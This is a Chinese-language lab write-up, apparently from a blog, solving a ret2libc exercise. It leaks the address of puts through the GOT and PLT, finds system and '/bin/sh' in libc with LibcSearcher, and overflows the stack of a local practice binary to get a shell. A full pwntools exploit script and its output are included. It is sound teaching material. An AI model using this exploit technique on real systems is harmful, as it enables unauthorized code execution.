利用ret2libc3实验原理,用pwn的文件来尝试一下。
首先,拿到了一个pwn文件,用IDA女神看看源程序是什么样子的。
这里有read函数,看来可以靠栈的溢出来实现getshell。
这次相比实验二的难点在于不允许使用system函数,然后都需要自己找到。
system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。
也就是说可以通过泄露出某个函数的地址,减去在libc中的相对偏移,就能得到libc的基址,利用system的相对偏移就可以找到system函数。这里利用了puts函数。
为了得到libc中函数的地址,我们用的是got表泄露。涉及到got表与plt表的关系,大家可以去这里看一下。
GOT表和PLT表知识详解 - qq_18661257的专栏 - CSDN博客
国际惯例,看一哈文件保护,果然没什么有效的保护。
接下来就是找system函数的地址,写个脚本,主要是为了实现与pwn文件交互。
from pwn import *
from LibcSearcher import * #库函数LibcSearcher
import pwnlib #能够进行动态调试
这两句可以理解为搭调试的环境,方便动态调试。
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
下面进行puts地址的泄露。
p=process('./pwn') #创建进程
elf=ELF('./pwn') #以ELF为格式创建对象
main=0x080484FD #主函数地址
payload='a'*112+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])
pwnlib.gdb,attach(p)
p.recvuntil('try\n')
p.sendline(payload)
puts=u32(p.recv(4)) #解包,取前四个
print('puts',hex(puts))
我们是在文件第一次执行的时候泄露puts。payload的作用如下图所示,将read函数的返回值赋为puts.plt,main函数的地址又为puts函数的返回值,puts.got作为puts函数的参数,泄露puts函数的地址。
主函数的地址在IDA里可以看到,至于填充多少个字符,方法在实验二讲述过。
main = 0x080484FD
接下来就是利用泄露出来的地址找到system和字符串_bin_sh。
LIbcSearcher利用泄露的puts函数的地址找到libc的版本,libc.dump可以查出偏移量,进而找出libcbase,也就是库函数的基址,再加上system的偏移就可以得到它的地址。
libc =LibcSearcher('puts',puts)
libcbase=puts-libc.dump('puts')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
print('system',hex(system)) #将system的地址打印出来
print('binsh',hex(bin_sh)) #将bin_sh打印
payload='a'*104+p32(system)+p32(0xdeadbeef)+p32(bin_sh)
p.sendline(payload)
p.interactive() #交互
在脚本终端可以看到打印的地址。
puts:0xf7df9140
system: 0xf7dd4940
binsh: 0xf7ef302b
输入ls,可以看到电脑中的文件,getshell,也可以看看我是谁,hh。
唉,实验做出来不容易,环境崩了以后调了好久,网上的方法都试过了,没有用(Tina噜,我的电脑和大家的不一样妈?!!!)。
最后将编译器重新装了一遍就好了......哭辽。
网友评论